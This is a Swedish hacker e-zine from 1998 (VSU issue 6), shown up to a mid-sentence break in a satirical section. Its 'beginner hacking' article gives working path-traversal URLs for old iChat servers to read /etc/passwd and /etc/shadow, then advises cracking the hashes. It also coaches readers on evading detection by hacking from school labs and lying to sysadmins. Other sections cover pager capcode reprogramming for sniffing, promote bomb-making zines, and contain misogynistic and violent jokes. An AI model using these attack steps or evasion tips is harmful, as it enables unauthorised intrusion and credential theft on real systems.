OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
_ __ ___
| | / /___ _____ / (_)___ _____ _
| | / / __ `/ __ \/ / / __ `/ __ `/
| |/ / /_/ / / / / / / /_/ / /_/ /
|___/\__,_/_/ /_/_/_/\__, /\__,_/
/____/
_____ __ _ _ __
/ ___// /__(_)_(_) /__________ _____ ___ ____ ___ ____ _
\__ \/ //_/ __ \/ __/ ___/ __ `/ __ `__ \/ __ `__ \/ __ `/
___/ / ,< / /_/ / /_(__ ) /_/ / / / / / / / / / / / /_/ /
/____/_/|_|\____/\__/____/\__,_/_/ /_/ /_/_/ /_/ /_/\__,_/
__ __ __
/ / / /___ ____ _____/ /___ ____ ___ ____ ______
/ / / / __ \/ __ `/ __ / __ \/ __ `__ \/ __ `/ ___/
/ /_/ / / / / /_/ / /_/ / /_/ / / / / / / /_/ / /
\____/_/ /_/\__, /\__,_/\____/_/ /_/ /_/\__,_/_/
/____/
VANLIGA SKÖTSAMMA UNGDOMAR NUMMER 6, OKTOBER 1998
Uppmaning
-=======-
Läs detta zine påtänd, med dina blodsbesudlade händer ivrigt smekande den
nyligen stulna Pentium II-datorn!!
Officiell epostadress till VSU-redaktionen
-========================================-
harnhammar@yahoo.com
(Skriv till oss om ni har några kommentarer, eller om ni vill prenumerera på
vår astuffa mailinglista, så att ni blir den allra första i 'teret som får
varje nummer av VSU.)
Innehållsförteckning
-==================-
( 1) " "
( 2) NYBÖRJARHACKING: HACKA iCHAT-SERVRAR
( 3) VSU - NU ÄVEN PÅ PAPPER
( 4) PERSONSÖKARE
( 5) DAGENS WORD-TIPS
( 6) NYFIKEN PÅ: SVENSKA ZINES, DEL 2
( 7) TITEL
( 8) NYBÖRJARHACKING: BAKDÖRRAR
( 9) TELIAHACKET
(10) Q & A
(11) EN AKADEMISK REDOGÖRELSE ÖVER VARFÖR TJUVSAMHÄLLET SUGER KUK
(12) ......
(Det var också meningen att vi skulle ha med en artikel vid namn "SLACKERS:
VANLIGA SKITSAMMA-UNGDOMAR", men vi orkade aldrig riktigt börja på den. Det
var mycket schyssta såpoperor på TV, och Krille-med-kniven hade fått in nya
roliga droger och Nintendo-spel, så det blev aldrig av att vi skrev den.)
Medverkande skribenter i detta nummer
-===================================-
Ulf, Motion och Panik
Astuff ASCII-logga ovan
-=====================-
Gjord i CGI-skriptet "Figlet"
------------------------------------------------------------------------------
" "
-===-
Monique, take the tigers away! Klart grabben ska ha en SCUD-missil! Unge man
nu schka ja berätta förej va live' går upå! En av en miljon exakt likadana
svenska $ofia-flickor ramlade ner i en flera kilometer djup gatubrunn, och
sedan var det bara 999999 exakt likadana svenska $ofia-flickor kvar. Commodore
Teenage Riot!
Fnord?
Kibo.
// Ulf of VSU
------------------------------------------------------------------------------
NYBÖRJARHACKING: HACKA iCHAT-SERVRAR
-==================================-
Här är en text för dig som vill bli en tuff hacker, men som inte kan så mycket
än. Den förklarar hur man hackar sig in i system som kör iChat.
iChat är ett chatsystem, för alla små 14-åriga mensflickor som chattar på
nätet med Jumper och sedan loggar ut och ligger i sina flickrum och tittar på
sina Backstreet Boys-planscher och pullar sig själva. iChat är ett populärt
chatsystem, och finns installerat lite överallt.
iChat innehåller en egen webserver, så man anropar detta chatsystem med sin
vanliga webläsare. Många av dessa iChat-system svarar på port 4080, så en
typisk adress till ett chatsystem kan se ut så här:
http://chat.med.ackliga.mensflickor:4080/en/satans/massa/kataloger/chat.html
Alla MIT-nördar (eller vilken jämrans skola de nu gick på) som har kodat
iChat var uppenbarligen dåliga på säkerhet, så iChats webserver har en
allvarlig bug som vi kan utnyttja för att läsa valfri fil (nästan) på deras
system. Ni förstår, alla webservrar har en slags rotkatalog där man hamnar om
man bara surfar till http://namn.pa.dator.com/ och inte skriver något filnamn.
Det är inte meningen att man ska kunna ta sig upp från denna serverrotkatalog
till katalogen ovanför hur som helst, men det kan man på iChats webserver,
helt enkelt genom att använda UNIX-systemens vanliga beteckning "..", som just
tar dig upp en katalog.
Man kan börja med att ta sig uppåt ett par tre kataloger:
http://chat.med.ackliga.mensflickor:4080/../../../etc/passwd
Om inte det fungerar är det bara att gå upp en katalog till:
http://chat.med.ackliga.mensflickor:4080/../../../../etc/passwd
När man har nått 6-7 "/../"-hopp och det fortfarande inte fungerar, så kan man
bara konstatera att det inte går på den här servern. iChat har nämligen ganska
nyligen insett att den här buggen finns, så den är rättad i deras senaste
versioner. Men som vanligt finns det ju massor av system där ute på nätet som
kör äldre versioner...
Med den här metoden kan du läsa vilken fil som helst på en server, som kan
läsas av den användare som iChat-webservern körs som. Du kan prova med:
/etc/passwd
/etc/shadow
/etc/services
/etc/inetd.conf
/etc/motd
(/etc/shadow behöver du, om /etc/passwd-filen inte innehåller några krypterade
lösenord utan bara har markeringarna "*" eller "x", istället för lösenorden i
det andra fältet där lösenorden ska vara. /etc/shadow ska ha sådana
filrättigheter att bara root ska kunna läsa den, men å andra sidan är det värt
att prova om man kommer åt den, eftersom det säkert finns idioter där ute som
kör sin iChat-webserver som root.)
Observera att chatsystemet säger åt webläsaren att dessa filer har
Content-type: text/html, så radbrytningarna i filerna kommer inte att visas
rätt i din webläsare. Det löser du genom att spara filerna från denna läsare
som source. I den sparade versionen så kommer då radbrytningarna att vara
rätt.
När du har fått tag på en fil som innehåller krypterade lösenord, antingen den
heter /etc/passwd eller /etc/shadow, laddar du ner lösenordsknäckarprogram och
ordlistor från någon 0nd websida. Sedan läser du dokumentationen som följer
med lösenordsknäckarprogrammet (RTFM!) och kör programmet i alla tänkbara
lägen mot din lösenordsfil och dina ordlistor. Då bör du åtminstone få
lösenord till någon användare på iChat-servern. Om du har tur så finns det
något annat roligt på samma dator, och inte bara en chat. UNIX-datorer är inte
så billiga, så de flesta företag brukar låta samma dator vara webserver,
mailserver och en massa annat (iChat-server?) samtidigt.
Sedan kan du hacka! Vi har redan varit inne på detta i VSU#4, men vi kan ju
ännu en gång påpeka att det är farligt att hacka hemifrån. Du kan bli spårad.
Det är bättre att leta reda på något ställe som har en massa nätuppkopplade
datorer, och där ingen verkar ha någon koll på vem som ska vara där och som
får använda dem. Det brukar gå att hitta sådana ställen på olika lokala
skolor. Om någon sysadmin på någon site som du har hackat upptäcker dig kan de
ju bara spåra de 0nda IP-paketen till detta ställe där du har suttit, och då
är det bara att sluta gå dit och leta reda på något nytt ställe att hacka
från.
Här är några till saker att tänka på:
* Se till att du inte har någon koppling till stället i fråga. Det är dumt om
det finns folk på stället som känner igen dig, och vet att det där är Pelle.
Det är viktigt att du är anonym.
* Ta inte med något som kan identifiera dig, typ ID-kort, bankomatkort eller
bibliotekskort. Om du åker fast och har på dig ditt ID-kort är det ju kört
direkt, men om du inte har det får du kanske chans att smita från sysadminen
senare. (Om ni inte hade fattat denna punkt själva förtjänar ni nästan att bli
bustade..)
* Anpassa dig så att du passar in i miljön där du ska vara. Om du vanligen
klär dig som en punkare och skolan du ska hacka från ligger på Östermalm kan
det vara en bra idé att anpassa ditt utseende efter hur folk ser ut på
Östermalm, så att du inte sticker ut för mycket.
* Välj inte något ställe att hacka från som har mycket med datorer att göra.
Det finns en risk att någon anställd har verklig koll på vad de gör, och
börjar logga. Gör alltså inte som SHA gjorde: hacka inte från KTH! Det är
farligt. Välj något ställe som fick Internet 1996 när mediahypen hade kommit
igång på allvar, men där utbildningen inte huvudsakligen handlar om teknik.
* Se till att kolla olika lagliga grejer på nätet (din mail, olika websidor
o s v) på din egen dator innan du åker till stället du ska hacka från. Annars
finns det en risk att du förr eller senare börjar slappna av ("det är ju ingen
som loggar på det här stället, de har ju ingen som helst koll") och börjar
läsa din email från datorerna på stället du ska hacka från - och det är också
farligt.
* Ha alltid koll på omgivningen omkring dig. Var alltid medveten om hur man
snabbt loggar ut och avslutar det program som du är inne i. Placera alltid
muspekaren vid den ruta som avslutar programmet du är i, så att man snabbt
kan klicka på den rutan. Det du gör är OLAGLIGT, så om det kommer in någon
uppretad 50-åring i datorsalen och säger "Jaha, vad gör ni här då?" vill du
snabbt kunna avsluta allting, så att du iallafall inte har några vittnen som
kan intyga att du satt på dator X och telnettade till dator Y.
* Om du vill vara riktigt ambitiös kan du kolla upp olika klasskataloger och
liknande, så att du har något svar på frågan "Vad går du på för kurs då?".
Ett OK svar kan vara "Jag går på reklamlinjen" (man hoppas att inte personen
man pratar med gör det, för då får man problem). Sedan fortsätter man att
titta på datorskärmen. Om de pratar mer får man ursäkta sig: "Du, den här
grejen måste vara klar i kväll, så jag har inte tid att prata". Folk kommer
inte att tro att en 0nd hacker har tagit sig in i just deras skola, så bara
du kommer med trovärdiga svar på eventuella frågor borde du klara dig undan
människor i samma datorsal.
* Hacka aldrig från datorsalar med mycket folk i. Sätt dig på någon dator en
bit från närmaste använda dator, så att ingen sitter bredvid dig och ser vad
du gör. Ha koll på hur folk rör sig i rummet, så att du kan logga ut om någon
kommer i närheten.
* Kom ihåg att det inte är olagligt att logga in med Telnet eller FTP på
avlägsna servrar. Det som är olagligt är att logga in med sådana program på
servrar där man inte har rätt att vara. Om någon usel sysadmin haffar dig,
neka därför alltid till att du har gjort något olagligt. Det där universitetet
i Australien har du ett konto på för att du pluggade där förut som
utbytesstudent, och det där amerikanska datorföretaget har du också ett konto
på, eftersom du har lärt känna en kille som jobbar där via IRC o s v.
* Det skadar aldrig att vara litet paranoid. Oavsett hur många Wingate-
maskiner som du använder för att koppla dig vidare så kan du ju aldrig veta om
inte någon som är ansvarig för den första maskinen i kedjan har upptäckt dig
och har ställt in att alla uppkopplingar ska loggas på deras skrivare.
// Ulf of VSU
------------------------------------------------------------------------------
VSU - NU ÄVEN PÅ PAPPER
-=====================-
VSU är inte bara ett e-zine. Vi är numera också ett fanzine. Vi VET vad våra
läsare behöver.
Jomen, vi är extremt stolta att kunna bringa er VSU#5.5 - det första numret av
VSU på papper!! Detta nummer är en samling (en slags "greatest flops" eller
"the worst of" eller vad ni vill) som innehåller texter från e-zinet VSU,
nummer 1-4.
Ur innehållet:
* YYYL!
* SAGAN 0M DEN ST0RE STYGGE HACKERVARGEN 0CH DE TRE SMÅ SYSADMiNGRiSARNA
* 0NDSKANS DUALiSM
* RAVEK0MMAND0T TALAR UT!
* K0MPETENTA SVENSKA J0URNALiSTER TAR UPP ViKTiGA, ANGELÄGNA FRÅG0R
* SAGAN 0M PHERDiNAND
.. och mycket mer.
Dessutom innehåller fanzinet några bonusspår i form av några av mina (Ulf of
VSU:s) texter för e-zinet 020-795611-Knulla-Döden. Som ni kanske vet så var
jag med och skrev för 020:s första tre nummer, och några av de texterna finns
också med i det här pappersfanzinet.
Alla dessa texter finns nu utgivna med BILDER för allra första gången i
världshistorien!!! Som om inte allt detta var nog har VSU#5.5 också en brutalt
0nd datarelaterad omslagsbild. Jag säger inte vad det är, men den är så 0nd
att hälften vore nog.
Om du bor i Sverige kostar varje nummer av VSU#5.5 20 kronor. Om du vill köpa
fanzinet, hör av dig via epost till harnhammar@yahoo.com , så skickar vi mer
information om hur du gör din beställning.
Jag vet att vi har några läsare utanför landets gränser, och om några av dem
vill köpa fanzinet kan de också höra av sig via epost, så kan vi räkna ut ett
pris för att skicka fanzinet till det land som de bor i.
Varje ny beställning kommer att få oss att trycka upp nya nummer av VSU#5.5
med vår sofistikerade print-on-demand-teknik (som går ut på att vi tar med en
viktig diskett, och åker via den uschla tunnelbanan med det buggade
signalsystemet till ett ställe där vi kan skriva ut gratis).
HAHA! Hittills har våra uschla texter bara drabbat nätanvändarna, men nu
kommer inte ens de icke uppkopplade människorna att slippa oss. Beställ gärna
ett extra nummer av VSU#5.5 till din djupt religiösa gammelfarmor. Hon kommer
säkert att älska VSU ;)
// Ulf of VSU
------------------------------------------------------------------------------
PERSONSÖKARE
-==========-
I stort sett alla personsökare som säljs idag är av typen "POCSAG". Detta står
för "Post Office Code Standardization Group". Denna standard skapades tidigt
av brittiska BT. POCSAG, såsom det är definierat i standarden är 512, 1200
eller 2400 bps (bitar per sekund) FSK-signalering, med en våglängd på +- 4.5
kHz. Datan är NRZ-kodad, där den högre frekvensen representerar 0 och den
lägre representerar 1.
POCSAG-signalformatet består av en "inledningssignal", och en eller fler
batchar. Inledningssignalen består av 576 bitar omväxlande 101010-mönster,
sänt i 512, 1200 eller 2400 bps. Personsökaren använder inledningssignalen
till att både avgöra om det mottagna är en POCSAG-signal och för
synkronisering med dataströmmen.
En batch består av en frame synkroniseringskod, följt av 8 frames. Varje frame
innehåller två kodord, separerade av ett synkroniseringskodord. Ett meddelande
kan ha så många kodord som behövs för att lämna meddelandet, och kan sträcka
sig genom många batchar, om det behövs. Slutet på ett meddelande indikeras med
ett "nästa adress"-kodord. Både adressering och användardata skickas i
kodorden. Skillnaden visas genom den sista siffran i kodorden (LSD) : 0 för
adressdata, och 1 för användardata.
Standardalfanumeriska data skickas i ett sjubitars format, där varje kodord
innehåller 2 6/7 bokstäver. I USA används av vissa telebolag ett system med 8
bitar alfanumerisk data, som tillåter användaren att skicka data som t ex
datorfiler och grafik, för att inte glömma vanliga meddelanden. 8 bitars
systemet möjliggör 2.5 bokstäver per kodord.
Numeriska data är på 4 bitar, och tillåter upp till 5 siffror att överföras
per kodord. Tonmeddelanden innehåller endast adressinformation.
*** Mottagardelen (Personsökaren)
Personsökare finns i hundratals former och storlekar, men de flesta är dock
tillverkade av Motorola. Numeriska personsökare står för lite mer än 60% av
marknaden, och resten upptas naturligtvis av alfanumeriska personsökare. De
adresseras unikt, med en sex till åtta siffror lång s k "capcode". Denna är
ofta skriven på personsökarenheten.
Numeriska personsökare har trots sin svaghet i och med att de bara kan visa
siffror bevisat motsatsen. Många sökningar är naturligtvis relaterade till
telefonnummer, men folk har även byggt upp ett kodsystem där varje siffer-
kombination står för något speciellt. Jag skulle gissa att Kina är det mest
aktiva landet i världen när det gäller numeriska sökningar, tätt följda av
alla knarklangare. (2112 0830 187 - Var på mötesplatsen halv nio, annars
skjuter jag dig i huvudet.)
Alfanumeriska personsökare är för det mesta kontaktade via en speciell service
där man manuellt får slå in eller säga meddelandet som skall skickas.
Personsökare kan även ha samma capcode som de adresseras via, t ex polisen i
många större städer använder sig av personsökare. Alltså kan flera
personsökare ha samma capkod, och sålunda torde det ej vara särskilt svårt att
t ex ändra capkoden i sin egen personsökare till den capkod som man är
intresserad av att sniffa trafiken på. De flesta personsökare har sin capkod
lagrad i en PAL-krets, vilken torde vara en smal sak att ändra capkod i, om
man vill det.
Så hemskt svårt behöver man dock ej göra det för sig, då det finns ritningar
och programvara till att programmera om personsökare av de flesta tillverkare
lätt tillgängligt på Internet. Det som behövs är för det mesta en speciell
seriekabel samt programvara. Är ni intresserade av detta kan jag hänvisa till
http://radiophone.dhp.com/ där mängder av information om både analog samt
digital radiokommunikation finns att inhämta.
I andra länder än Sverige, USA t ex, finns personsökare som kan programmeras
"över luften" av företaget som tillhandahåller tjänsten i fråga. Denna teknik
kallas OTP (Over The air Programming). De möjligheter som finns vid OTP-
programmering brukar inskränkas till att lägga till / ta bort capkoder eller
låsa personsökaren om de ligger efter med räkning.
*** Tjänster
I Sverige har marknaden slutat att köpa personsökare, till förmån för
mobiltelefoner, främst då GSM. Men i andra länder är utbudet av olika tjänster
som kan knytas till personsökaren stort.
Email är nog bland det trevligaste man kan få skickat till sin personsökare
(om man inte är med på en miljon mailinglistor). Amerikanska företag som t ex
SkyTel och Radiomail tillhandahåller denna tjänst, och ger kunden en email-
adress som brukar se ut som följande: nummer@skymail.com. Detta behöver man
dock EJ betala för - det finns ett flertal olika helt gratis personsökar-
gateways på Internet, och diverse olika shellscripts som använder sig av detta
och via email forwarding från en UNIX-maskin kan skicka din personsökare t ex
subjekt- och från-raden på ett email. Ett sådant program är IXOBEEPER som bör
kunna hittas lätt med en archie-förfrågan.
Det finns även två RFC-filer om personsökare och Internet: 1568 samt 1569.
Förstnämnda, 1568 behandlar SNPP, Simple Network Paging Protocol, vilket har
mycket stora likheter med SMTP (Simple Mail Transfer Protocol), d v s
kommandon i stil med:
PAGE - Följt av personsökarnumret.
MESS - Följt av det numeriska / alfanumeriska meddelandet.
SEND - Skicka.
& QUIT - Avsluta sändning och logga ur.
Den andra RFC-filen, 1569, behandlar adressering av alla personsökare under en
speciell domän, TPC.INT, vilken då skulle vara reserverad för tjänster med
direkt anslutning till telefonbolag. Användarnamn skulle då vara begränsade
till personsökarnumret, och en sökning på t ex amerikanska 1-800-555-1212
skulle sändas som "pager@2.1.2.1.5.5.5.0.0.8.1.tcp.int." Dock bör nämnas att
ingen av dessa RFC-filer har legat till grund för någon standard hur detta
skall hanteras över Internet. Fortfarande är det "hemskrivna" program som
hanterar så kallade "pager gateways", fritt översatt "personsökarportar".
*** Personsökarfrekvenser och nättyper
Österrike 162.050 - 162.075 T,N,A
Australien 148.100 - 166.540 T,N,A
411.500 - 511.500 T,N,A
Kanada 929.025 - 931-975 T,N,A
138.025 - 173.975 T,N,A
406.025 - 511.975 T,N,A
Kina 152.000 - 172.575 N,A
Danmark 469.750 N,A
Finland 450.225 T,N,A
146.275 - 146.325 T,N,A
Frankrike 466.025 - 466.075 T,N,A
Tyskland 465.970 - 466.075 T,N,A
173.200 T,N,A
Hong Kong 172.525 N,A
280.0875 T,N,A
Indonesien 151.175 - 153.050 A
Irland 153.000 - 153.825 T,N,A
Italien 466.075 T,N,A
161.175 T,N
Japan 278.1625 - 283.8875 T,N
Korea 146.320 - 173.320 T,N,A
Malaysia 152.175 - 172.525 N,A,V
931.9375 N,A
Holland 156.9865 - 164.350 T,N,A
Nya Zealand 157.925 - 158.050 T,N,A
Norge 148.050 - 169.850 T,N,A
Singapore 161.450 N,A
931.9375 N,A
Sverige 169.8 T,N,A
Schweiz 149.5 T,N,A
Taiwan 166.775 N,A
280.9375 N,A
Thailand 450.525 N,A
172.525 - 173.475 N,A
England 138.150 - 153.275 T,N,A
454.675 - 466.075 T,N,A
*** Teckenförklaring till tabellen
T = Ton
N = Nummer
A = Alfanumerisk
V = Röst
---------------------------------------
motion@webservices.se
http://c5.hakker.com/
PGP key? finger motion@geek.rcc.se
---------------------------------------
// Motion
------------------------------------------------------------------------------
DAGENS WORD-TIPS
-==============-
Släng ut skiten, och installera EMACS eller Micro EMACS istället.
// Ulf of VSU
------------------------------------------------------------------------------
NYFIKEN PÅ: SVENSKA ZINES, DEL 2
-==============================-
I vårt förra nummer (VSU#5) hade vi med en kort beskrivning av vad zines är,
samt en genomgång av den svenska zinesscenen. Under den tid som har flutit
förbi sedan dess har några nya zines startat, och det har kommit ut nya
nummer av de zines som vi skrev om då. Vi hälsar "Vanliga Svenska Priikers",
"K.L.0.R.B's Frikar Läcktyr", "Mr. Headache's Underground" och "Liberalt
Oorganiserat Drägg" välkomna till listan. Dessutom har vi med ny information
om "Just Another Zine", "Klan of the BloodStained Blade" och "Underground
eXperts United", som vi skrev om i förra numret.
Här följer en uppdatering av vår svenska zineslista från VSU#5:
* JUST ANOTHER ZINE (JAZ)
Inriktning: Ironisk humor
Antal utgivna nummer: 3
Status: Levande
Ladda ner från: http://hem2.passagen.se/k3wl/
* K.L.0.R.B'S FRIKAR LÄCKTYR
Inriktning: Tekniska artiklar och allmän 0ndska
Antal utgivna nummer: 1
Status: ???
Officiell websida: http://members.xoom.com/kl0rb/
* KLAN OF THE BLOODSTAINED BLADE (KBB)
Inriktning: Tekniska artiklar, med mycket information om phone phreaking och
tillverkning av bomber
Antal utgivna nummer: 15
Status: Död
Officiell websida: http://www.smite.org/kbb/
* LIBERALT OORGANISERAT DRÄGG (LOD)
Inriktning: Allmän 0ndska plus lite phone phreaking
Antal utgivna nummer: 2
Status: Levande
Kontaktadress: liberalt_oorganiserat_dragg@usa.net
* MR. HEADACHE'S UNDERGROUND
Inriktning: Allmän undergroundinriktning, med tips på hur man kan hämnas på
sina fiender och liknande. De har mycket material som är klippt
från olika publikationer, men de anger alltid källan.
Antal utgivna nummer: 5
Status: Levande
Officiell websida: http://www.geocities.com/Baja/1156/
* UNDERGROUND EXPERTS UNITED (uXu)
Inriktning: uXu har funnits sedan 1991, och har gett ut massvis med texter. De
har breddat sig, och på gott och ont känns de inte lika tydligt
underground som sina zineskollegor (trots namnet!). En del av
deras material skulle kunna vara med i någon uppkäftig liten
kulturtidskrift, typ "Äcklet".
Språk: Engelska i huvudsak, men ger även ut en del material på svenska
Antal utgivna nummer: 31
Status: Levande
Officiell websida: http://www.uxu.org/
* VANLIGA SVENSKA PRIIKERS (VSP) [a]
Inriktning: Tekniska artiklar om phone phreaking, med speciell inriktning på
beige boxing
Antal utgivna nummer: 4
Status: Levande
Officiell websida: http://members.xoom.com/Priik/
KOMMENTARER:
[a] ..hmm, jag undrar just var de fick inspirationen till det namnvalet från
;).. Förutom zinet innehåller VSP:s websida bl a phreakingrelaterade
foton och program.
Numera finns det alltså totalt 14 svenska zines med på vår astuffa lista!!
Wow, 14 stycken! Det börjar ju verkligen att likna något, speciellt med tanke
på vad få av dessa som fanns bara för några år sedan.
Skicka gärna era zines till oss VSU:are på vår officiella epostadress
harnhammar@yahoo.com , så slipper vi leta upp dem själva på diverse skumma
websidor. Skriv till samma adress om vi har publicerat felaktig information
(status, antal utgivna nummer eller dylikt) för något av dessa zines, i våra
listor i VSU#5 eller VSU#6. Fler delar av den här listan kommer att komma ut.
"Vi brinner för det här permanent", som det rappas i visan.
Ni kan också skriva till oss om ni har publicerat någon typ av hack/phreak/
kemi/virusinformation på något annat sätt än genom ett zine. Ni kanske har en
h/p-grupp som ger ut textfiler eller exploits. I så fall vill vi att ni
skickar adresser (www, ftp) där man kan ladda ner allt som ni har släppt, så
kan vi skriva om det i något kommande nummer. Vi vet att det finns folk som
har släppt sådan information här i Sverige - exempelvis brukade Swedish
Infomania släppa textfiler om kemi och bombtillverkning förut, och det finns
också en hackingrelaterad serie av textfiler som heter "My Word", men det
finns säkert en massa annat sådant material som vi har missat.
// Ulf of VSU
------------------------------------------------------------------------------
TITEL
-===-
[Scenanvisning. Ett rum med inredning, men med en allvarlig brist på folk. En
efter en kommer tre personer in i rummet.]
Röst 1: - Han heter Ulf, och han är medelklass, så han måste föras till
villaområdet med detsamma!
Röst 2: - Ööööhh, villaområdet, har'u fått spader? Där blir han medelklass ju!
Röst 3: - Ååh nej nej! Ginsberg, jag vill stanna här hos dig!!
Välkommen till ett 24 timmars survival game, som är sponsrat av Snickers.
Detta survival game är dels till för att ni ska köpa vår uschla choklad, och
dels till för att ni ska slippa tänka på det 90 års survival game som ni redan
spelar. Klättermus, karriärist, det kan gå på ett ut. Ska det vara 0nt, ska
det vara VSU!
Välkommen till den amerikanska drömmen i villorna i Ljungby och Lotorp, där de
välansade moderatmänniskorna suger av Ronald McDonald varje dag och kommer hem
och har sex till CD-skivan "Smurfhits vol. 18: Sånger att älska till" och där
de inte tvekar en sekund att tacka ja till diverse skamliga förslag från
Eric$$on. Familjelivet är för hjärnan vad rullat0rn är för kroppen: en krycka
att ta till, när man har tagit skada av sitt åldrande, så att man inte längre
klarar av saker på riktigt. Man kommer osökt att tänka på vissa insekter vars
nervsystem är uppbyggt så att kroppen klarar av att fortsätta röra sig en
stund, fast de har blivit halshuggna.
If (NyttJobb.Lön > GammaltJobb.Lön) then BytJobbDirekt(NyttJobb);
Se de härligt obildade skitungarna från villaområdena i Lotorp, som just har
slösat bort 15 år av sina liv på att dra i en joystick!
Flockmänniskorna! Slavmänniskorna! De MYCKET FÖR MÅNGA!
Allt i mainstreamsamhället suger alltid, inklusive rättsväsendet. Borta i USA
har Kevin Mitnick varit häktad i över tre år utan att ha fått någon rättegång.
Skåda lämmeltåget av hundratusentals exakt likadana indieflickor, som går och
köper samma Radiohead-CD exakt samma dag, för att media har sagt åt dem att
köpa den. Man är ett offer för massmedia. Det finns många bättre band i samma
genre, men de ligger inte på lika stora skivbolag, så för att upptäcka deras
musik måste man anstränga sig lite själv, vilket inte så många människor
orkar. Var egentligen det klonade fåret Dolly något nytt? Folk verkar ju vara
bra själva på att bli exakta kopior av varandra, så vi behöver inte kunna
klona.
Du är lurad. All popmusik och all annan populärkultur är bara en marknads-
föringsploj för att få sälja mer kläder och fler stereoanläggningar.
Maskiner är vi allihopa. Skillnaden mellan Metal Maniac och lysröret ovanför
Metal Maniac är jävligt liten.
Välkommen till den förljugna akademiska världen, där alla har fastnat i leken
"Följa Professorn" (en lek för vuxna, som har exakt samma regler som en lek
för barn som heter "Följa John"). De tror att de är fria att komma med helt
nya teorier, men egentligen är de lika fastlåsta av trender och tidsandan som
vilken klädaffär som helst. Om det nu är så viktigt att hålla folk i allmänhet
och arbetarklassen i synnerhet utanför era högstående jävla diskussioner kan
ni väl gå tillbaks till att prata latin? Det har ju nyttjats förr i tiden för
att undanhålla information, och då gick det över all förväntan. Det vi talar
om här är människor vars hela inre kan liknas vid någon jämrans databassök-
ning. Man tänker aldrig själv, utan letar reda på vad kända akademiker har
sagt och lär sig sedan detta utantill. Dessutom är ju läraryrket dömt att dö
ut, eftersom vi har uppfunnit både bandspelare och video för länge sedan. En
lärare är ju samma sak som en bandspelare - en grej som mekaniskt läser upp
ett förprogrammerat meddelande utan några som helst variationer.
Systembolagskatalogens beskrivningar är inte anpassade till verkligheten. Ett
allvarligt glapp har uppstått mellan teori och praktik. Beskrivningarna i
katalogeländet ser ut så här: "Ett fruktigt vitt vin med aningen besk efter-
smak". Detta är dåligt anpassat till normalsvenskens alkoholvanor. Om de
skulle tänka mer på sina kunder skulle deras beskrivningar i katalogen snarare
se ut så här: "ööh faan du blir full jehvla snabt på den hära flarran grabben
men de kåmmerå smaka skit i munnjeveln efterettag såru kanschke kåmmerå b-höva
spy fan". (Vanliga Skämtsamma Ungdomar!?)
Ack! Ni tvetrogna, som ständigt och skändligen förgäves söker efter dolda
budskap och meningar i allt. I sanning förtälja jag eder: litteraturen äro ett
konsthantverk! Bra litteratur uppstå, då författaren placera ut mellanslagen
mellan orden i vackra mönster. Allt annat (bokstäverna i sig, de eventuella
ord som bokstäverna bildar) är oviktigt - endast mönstret som mellanslagen
bilda i texten äro af betydelse.
Vänskap är som ett cat-kommando (eller TYPE om vi talar om sådana där äckliga
kommersiella operativsystem från Malmskillnadsgatan). Man har vänner för att
kunna kopiera deras kunskap och den information som de har samlat på sig. En
vän är alltså samma sak som en journalist, eftersom journalisterna också finns
för att förmedla information till dig.
Sannerligen, det hårt kriminellt belastade Brödraskapet VSU har skådat
världens sanna värden! Jag ger dig endast två alternativ: konstnär eller
maskin! Brottsling eller oväsentlig villaägare! Bryt mot lagen, eller bli
bortglömd! Nörden är uppfinningens moder! "I've got nothing to say, but it's
OK. Good morning. Good morning. Good morning." (Lennon/McCartney) Vi står för
det förvirrade och upprörande, de åsikter som ni silar bort i er lismande
självgodhet.
Välkommen till det redan urspårade informationssamhället, där Passagen och
Torget ivrigt tävlar om att slå nya bottenrekord i uselt förenklande kvälls-
tidningsjournalistik, där all text är färdigvinklad och där "journalisten"
redan har tagit ställning åt dig, så att du slipper tänka. Allt kommer att bli
så mycket bättre om alla fåniga jävla företag och alla fåniga jävla myndig-
heter och klubbar och organisationer har fula websidor på World Wide Fucking-
web med limegröna logos och animerade GIF:far SOM SUGER! Låt oss alla gå ner
på knä och tillbe vår Gud, Guldkalven WWW! Våga aldrig öppna TCP/IP-
uppkopplingar mot någon annan port än nummer 80 - det kan vara farligt! Vi ska
nå fram till en ny värld, och vi ska ta ett symboliskt steg för mänskligheten
genom att byta ut den gamla DALAHÄSTEN mot en skinande ny DATAHÄST!!! Du kan
vinna ett fjälltält och en verktygslåda, om du lyckas bevisa för KK-stiftelsen
att du är den globala byns största byfåne - THE village idiot of the global
village.
Låtar slutar. "Det här var Seg Dion med en dålig låt, och du lyssnar på Radio
Mix Megapol Power Lugna Favoriter 10x,x. Jag heter Anders Trist, och det
spelar ingen som helst roll vad jag säger så länge jag har kvar det här
onaturligt hurtiga tonfallet, eftersom både jag och alla mina lyssnare är helt
döda inuti. Medeltemperaturen i Sverige idag är 9,3 grader - kallt, eller hur?
Nu är det dags för lite reklam, men häng kvar: den här timmen ska vi spela
Phil Collins, Dr Bombay och Michael Bolton!!!!"
Tänk på avståndet mellan plattformen och tunnelbanetåget, så att du helgar
det. Mind the gap! (Och då talar jag alltså inte om klädaffärskedjan The Gap.)
Samhället har lyckats samla ihop allt Eric$$onskräp och allt Teliaskräp på
samma ställe, men vi har inte lyckats ta död på dem än, vilket är synd. (Det
var väl därför vi skulle samla ihop de allra falskaste i de där fula husen,
för att kunna ha ihjäl dem lättare?) Det är inte lika tragiskt när första
klassvagnarna på tåg råkar ut för olyckor, som det är när det händer något med
andra klassvagnarna. Jag menar, för att få råd att åka första klass måste man
ju ha sålt sig, så de människorna förtjänar ju en och annan trafikolycka.
Anna Book kommer ut ur kulissen helt orepeterat, för att påbörja sin nya
karriär som politisk singer/songwriter: "P-K-K, du är i mina tankar, K-G-B,
mitt hjärta det bankar, R-A-F, du får mig alltför lätt ur balans".
Skalman bär snabbt ut henne, och påbörjar en meningslös akademisk monolog om
huruvida man löses upp direkt om man dyker med huvudet före ner i en simbas-
säng full med frätande syra eller om man hinner känna att det gör ont först.
Politiska åsikter är som strumpor: ibland kan man ha blåa, ibland röda eller
gröna. Det är inte så noga. Det viktiga är att man byter ofta - annars börjar
de att lukta.
Äntligen kan det avslöjas: spermafläckarna på Monica Lewinskys klänning kom
inte alls från Bill Clinton!! Frk Lewinsky är inte bara politikergroupie, hon
är även hackergroupie! Fläckarna kom faktiskt från ett tillfälle när hon var
totalt omåttlig, och sög av diverse VSU-profiler + samtliga Phrack-redaktörer
